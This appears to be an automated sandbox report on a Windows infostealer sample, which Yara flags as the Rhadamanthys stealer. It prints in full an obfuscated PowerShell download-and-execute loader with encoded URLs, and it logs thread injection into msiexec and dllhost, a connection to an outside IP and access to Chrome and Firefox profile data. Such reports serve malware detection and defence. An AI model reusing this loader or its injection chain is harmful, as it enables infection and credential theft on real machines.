                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.149.241.141 2023Jump to behavior
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: amsi64_7696.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8060, type: MEMORYSTR
                        Allocates memory in foreign processes
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1E5317D0000 protect: page read and write
                        Encrypted powershell cmdline option found
                        Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded q"x8w^gI@JByWEXJ"hQ>i
                        Source: unknownProcess created: Base64 decoded q"x8w^gI@JByWEXJ"hQ>i
                        Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded q"x8w^gI@JByWEXJ"hQ>i Jump to behavior
                        Queues an APC in another process (thread injection)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3BB0000Jump to behavior
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1E5317D0000
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeMemory written: C:\Windows\System32\dllhost.exe base: 7FF7D87314E0
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"Jump to behavior
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$kollationernendkaldebefjelses='elefantridderne';;$flumed='rundingernes';;$metropoler='larceners';;$provisionsindtgters='drivremmen';;$smedejernslaage=$host.name;function elevtimens($ballongynges){if ($smedejernslaage) {$firspandets79=2} for ($kollationerne=$firspandets79;;$kollationerne+=3){if(!$ballongynges[$kollationerne]) { break };$bibliofil+=$ballongynges[$kollationerne];$squibbery='jogurternes'}$bibliofil}function fortynderes($thuds){ .($nongame) ($thuds)}$fangled=elevtimens 'ton repltsi.dew';$fangled+=elevtimens 's e.ubc,c olr.i hestns t';$gasted=elevtimens 's.manobazobip l lahame/';$dealation=elevtimens 'cotvalslsej1pl2';$hiwire='st[lunf,e.dtl . scee sr iv,liroc .ehyp .o ,iunnrytfrm.ia n maudg oemir l]va:ch:ras te tc su r aiprt ymipspr foint poaacn,orklna= ,$ vdbeeaga.ul zaintfli.po an';$gasted+=elevtimens 'an5 t.co0 a(fuwwiigen kdbao ,wkosho manretu t1fe0he.da0 i;o trw eihenu 6 4j ;fa ,mxsn6 o4fi;b drnivfy:um1.e3fo1u .,t0 ,)se begnoehjc,ok loet/ h2i 0,n1im0.v0du1ri0 p1pr .kfj,is,rstedef,novrxsk/af1ud3ru1to.ve0';$endomysial=elevtimens ',nuasshae,krre-biaougbae n at';$niveauoplysning=elevtimens ' h stant bptes t: h/kh/unpratras y.a gnor lo ,u ap o/u aalb ./p l aainnbrehvyno.fod ksvap.r>cohemt .tn.p,ask :r / / nwsmw uwfa.yapskurenhoebae ut b. aapee.n/aracobs,/ lt,arenspec yo.. td oskrp';$afpolitiserendes=elevtimens ',a>';$nongame=elevtimens 'ruik,enox';$stripperne='bystyrers';$assumptiveness='\nonfattening.ret';fortynderes (elevtimens ' p$ungsell.o be,afllh : ,f no pr ss ,dnoeno=co$dier nlivly: abop lpp d pa .t a m+sa$baa ,sdoscau um pudtmeiviv tesun e ds.us');fortynderes (elevtimens 'ex$ kgmalunobab,ea lgr:k bruiprbtue kh.wo ,lrodfle mlbus ues,n vsab=,y$ovn sis vfoetiaacu tosppvilinyplskvnunikon lg .mess pgrlalivat s(af$praunf epnyo lpoisetb irrs.ped r re ynmudpretvsma)');fortynderes (elevtimens $hiwire);$niveauoplysning=$bibeholdelsens[0];$heda=(elevtimens ' a$maglalgaoprbr,arula :myskotulr am smnoeok=inn ae uw s-unodib ,j efoc itpu r sg y osf tl.ed mbl.re$sufmbainn kgdelpae id');fortynderes ($heda);fortynderes (elevtimens 'fo$e s stubrlem im uecu. hsletoapad.neskrpasha[n $p eshngtd ao fm cyses ribaaprlbo]tr=un$alg falus tane cd');$preposed=elevtimens ' o$afsp,ttyrp.mhem.oe,n.sndacocrwgrn ol locoamyd afo istlsteti(as$ on niprvrue a tumuoc,psul kysasfank imanrogko,p,$inhmajgaewarben nemirbjsre)';$hjerners=$forsde;fortynderes (elevtimens ' .$,ngtil o.obbla ll s:hadear,eio,ktekroediv .achrale fr sn.ie espa=hi( et ,emess t k-pepala etdahsi an$behlgjggeovrunnlee rrsksha)');while (!$drikkevarernes) {fortynderes (elevtimens ' t$ gbelino b airlhj: lpomrv ou.teneges ptuns,lyp r f=,u$ ,a on stmyi sc way p,li st a hl sisusmit aianc') ;fortynderes $preposed;fortynderes (elevtimens ' osh,t pas rhatso-e srelene.iemupch m4');fortynderes (elevtimens ' i$prginlseo nbblasklde:vedi rs irdkt.kvies vmiakl
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$kollationernendkaldebefjelses='elefantridderne';;$flumed='rundingernes';;$metropoler='larceners';;$provisionsindtgters='drivremmen';;$smedejernslaage=$host.name;function elevtimens($ballongynges){if ($smedejernslaage) {$firspandets79=2} for ($kollationerne=$firspandets79;;$kollationerne+=3){if(!$ballongynges[$kollationerne]) { break };$bibliofil+=$ballongynges[$kollationerne];$squibbery='jogurternes'}$bibliofil}function fortynderes($thuds){ .($nongame) ($thuds)}$fangled=elevtimens 'ton repltsi.dew';$fangled+=elevtimens 's e.ubc,c olr.i hestns t';$gasted=elevtimens 's.manobazobip l lahame/';$dealation=elevtimens 'cotvalslsej1pl2';$hiwire='st[lunf,e.dtl . scee sr iv,liroc .ehyp .o ,iunnrytfrm.ia n maudg oemir l]va:ch:ras te tc su r aiprt ymipspr foint poaacn,orklna= ,$ vdbeeaga.ul zaintfli.po an';$gasted+=elevtimens 'an5 t.co0 a(fuwwiigen kdbao ,wkosho manretu t1fe0he.da0 i;o trw eihenu 6 4j ;fa ,mxsn6 o4fi;b drnivfy:um1.e3fo1u .,t0 ,)se begnoehjc,ok loet/ h2i 0,n1im0.v0du1ri0 p1pr .kfj,is,rstedef,novrxsk/af1ud3ru1to.ve0';$endomysial=elevtimens ',nuasshae,krre-biaougbae n at';$niveauoplysning=elevtimens ' h stant bptes t: h/kh/unpratras y.a gnor lo ,u ap o/u aalb ./p l aainnbrehvyno.fod ksvap.r>cohemt .tn.p,ask :r / / nwsmw uwfa.yapskurenhoebae ut b. aapee.n/aracobs,/ lt,arenspec yo.. td oskrp';$afpolitiserendes=elevtimens ',a>';$nongame=elevtimens 'ruik,enox';$stripperne='bystyrers';$assumptiveness='\nonfattening.ret';fortynderes (elevtimens ' p$ungsell.o be,afllh : ,f no pr ss ,dnoeno=co$dier nlivly: abop lpp d pa .t a m+sa$baa ,sdoscau um pudtmeiviv tesun e ds.us');fortynderes (elevtimens 'ex$ kgmalunobab,ea lgr:k bruiprbtue kh.wo ,lrodfle mlbus ues,n vsab=,y$ovn sis vfoetiaacu tosppvilinyplskvnunikon lg .mess pgrlalivat s(af$praunf epnyo lpoisetb irrs.ped r re ynmudpretvsma)');fortynderes (elevtimens $hiwire);$niveauoplysning=$bibeholdelsens[0];$heda=(elevtimens ' a$maglalgaoprbr,arula :myskotulr am smnoeok=inn ae uw s-unodib ,j efoc itpu r sg y osf tl.ed mbl.re$sufmbainn kgdelpae id');fortynderes ($heda);fortynderes (elevtimens 'fo$e s stubrlem im uecu. hsletoapad.neskrpasha[n $p eshngtd ao fm cyses ribaaprlbo]tr=un$alg falus tane cd');$preposed=elevtimens ' o$afsp,ttyrp.mhem.oe,n.sndacocrwgrn ol locoamyd afo istlsteti(as$ on niprvrue a tumuoc,psul kysasfank imanrogko,p,$inhmajgaewarben nemirbjsre)';$hjerners=$forsde;fortynderes (elevtimens ' .$,ngtil o.obbla ll s:hadear,eio,ktekroediv .achrale fr sn.ie espa=hi( et ,emess t k-pepala etdahsi an$behlgjggeovrunnlee rrsksha)');while (!$drikkevarernes) {fortynderes (elevtimens ' t$ gbelino b airlhj: lpomrv ou.teneges ptuns,lyp r f=,u$ ,a on stmyi sc way p,li st a hl sisusmit aianc') ;fortynderes $preposed;fortynderes (elevtimens ' osh,t pas rhatso-e srelene.iemupch m4');fortynderes (elevtimens ' i$prginlseo nbblasklde:vedi rs irdkt.kvies vmiakl
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$kollationernendkaldebefjelses='elefantridderne';;$flumed='rundingernes';;$metropoler='larceners';;$provisionsindtgters='drivremmen';;$smedejernslaage=$host.name;function elevtimens($ballongynges){if ($smedejernslaage) {$firspandets79=2} for ($kollationerne=$firspandets79;;$kollationerne+=3){if(!$ballongynges[$kollationerne]) { break };$bibliofil+=$ballongynges[$kollationerne];$squibbery='jogurternes'}$bibliofil}function fortynderes($thuds){ .($nongame) ($thuds)}$fangled=elevtimens 'ton repltsi.dew';$fangled+=elevtimens 's e.ubc,c olr.i hestns t';$gasted=elevtimens 's.manobazobip l lahame/';$dealation=elevtimens 'cotvalslsej1pl2';$hiwire='st[lunf,e.dtl . scee sr iv,liroc .ehyp .o ,iunnrytfrm.ia n maudg oemir l]va:ch:ras te tc su r aiprt ymipspr foint poaacn,orklna= ,$ vdbeeaga.ul zaintfli.po an';$gasted+=elevtimens 'an5 t.co0 a(fuwwiigen kdbao ,wkosho manretu t1fe0he.da0 i;o trw eihenu 6 4j ;fa ,mxsn6 o4fi;b drnivfy:um1.e3fo1u .,t0 ,)se begnoehjc,ok loet/ h2i 0,n1im0.v0du1ri0 p1pr .kfj,is,rstedef,novrxsk/af1ud3ru1to.ve0';$endomysial=elevtimens ',nuasshae,krre-biaougbae n at';$niveauoplysning=elevtimens ' h stant bptes t: h/kh/unpratras y.a gnor lo ,u ap o/u aalb ./p l aainnbrehvyno.fod ksvap.r>cohemt .tn.p,ask :r / / nwsmw uwfa.yapskurenhoebae ut b. aapee.n/aracobs,/ lt,arenspec yo.. td oskrp';$afpolitiserendes=elevtimens ',a>';$nongame=elevtimens 'ruik,enox';$stripperne='bystyrers';$assumptiveness='\nonfattening.ret';fortynderes (elevtimens ' p$ungsell.o be,afllh : ,f no pr ss ,dnoeno=co$dier nlivly: abop lpp d pa .t a m+sa$baa ,sdoscau um pudtmeiviv tesun e ds.us');fortynderes (elevtimens 'ex$ kgmalunobab,ea lgr:k bruiprbtue kh.wo ,lrodfle mlbus ues,n vsab=,y$ovn sis vfoetiaacu tosppvilinyplskvnunikon lg .mess pgrlalivat s(af$praunf epnyo lpoisetb irrs.ped r re ynmudpretvsma)');fortynderes (elevtimens $hiwire);$niveauoplysning=$bibeholdelsens[0];$heda=(elevtimens ' a$maglalgaoprbr,arula :myskotulr am smnoeok=inn ae uw s-unodib ,j efoc itpu r sg y osf tl.ed mbl.re$sufmbainn kgdelpae id');fortynderes ($heda);fortynderes (elevtimens 'fo$e s stubrlem im uecu. hsletoapad.neskrpasha[n $p eshngtd ao fm cyses ribaaprlbo]tr=un$alg falus tane cd');$preposed=elevtimens ' o$afsp,ttyrp.mhem.oe,n.sndacocrwgrn ol locoamyd afo istlsteti(as$ on niprvrue a tumuoc,psul kysasfank imanrogko,p,$inhmajgaewarben nemirbjsre)';$hjerners=$forsde;fortynderes (elevtimens ' .$,ngtil o.obbla ll s:hadear,eio,ktekroediv .achrale fr sn.ie espa=hi( et ,emess t k-pepala etdahsi an$behlgjggeovrunnlee rrsksha)');while (!$drikkevarernes) {fortynderes (elevtimens ' t$ gbelino b airlhj: lpomrv ou.teneges ptuns,lyp r f=,u$ ,a on stmyi sc way p,li st a hl sisusmit aianc') ;fortynderes $preposed;fortynderes (elevtimens ' osh,t pas rhatso-e srelene.iemupch m4');fortynderes (elevtimens ' i$prginlseo nbblasklde:vedi rs irdkt.kvies vmiaklJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526259B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,14_3_00007DF4526259B0
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 0000000D.00000003.1943543611.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000003.1940336602.0000000000130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2033441930.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000003.1955237609.00000000232F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\y572q81e.defaultJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
